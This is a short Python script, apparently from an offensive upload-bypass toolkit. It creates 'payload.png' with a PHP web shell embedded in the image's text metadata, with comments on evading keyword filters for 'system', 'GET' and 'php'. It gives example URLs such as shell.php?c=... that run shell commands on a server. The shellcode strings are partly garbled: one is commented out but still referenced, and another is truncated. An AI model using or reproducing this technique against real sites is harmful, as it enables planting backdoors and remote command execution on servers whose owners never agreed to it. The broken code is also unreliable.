from PIL import Image # Shellcodes - Bypass included : Keyword Recognition : System, GET, php # --- How to use : http://localhost/shell.php?c=echo%20'
';ls

#shellcode  = ""
# --- How to use : http://localhost/shell.php?_=system&__=echo%20'
';ls
shellcode2 = ";').($_^'/');?>"


print "\n[+] Advanced Upload - Shell inside metadatas of a PNG file"

# Create a backdoored PNG
print " - Creating a payload.png"
im = Image.new("RGB", (10,10), "Black")
im.info["shell"] = shellcode
reserved = ('interlace', 'gamma', 'dpi', 'transparency', 'aspect')

# undocumented class
from PIL import PngImagePlugin
meta = PngImagePlugin.PngInfo()

# copy metadata into new object
for k,v in im.info.iteritems():
	if k in reserved: continue
	meta.add_text(k, v, 0)
im.save("payload.png", "PNG", pnginfo=meta)

print "Done"